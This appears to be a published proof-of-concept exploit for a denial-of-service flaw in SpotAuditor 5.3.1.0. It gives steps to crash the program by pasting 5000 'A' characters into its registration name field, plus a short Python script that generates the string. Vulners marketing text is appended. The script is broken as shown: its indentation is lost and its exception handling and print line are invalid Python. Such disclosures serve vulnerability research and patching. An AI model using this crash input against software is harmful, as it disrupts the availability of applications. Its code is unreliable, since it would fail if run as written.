# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/
# <POC by Sanjana Shetty>
# Steps
[1] Install the SpotAuditor software
[2] Access the register functionality
[3] In the name field enter 5000 A's and press enter, this will crash the
application.
==== use below script to create 5000 A's to a text file and copy it to the name field============
print ("# POC by sanjana shetty")
try:
f = open("file.txt","w")
junk = "\x41" * 5000
f.write(junk)
print ("done")
except (Exception, e):
print ("#error - ") + str(e)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation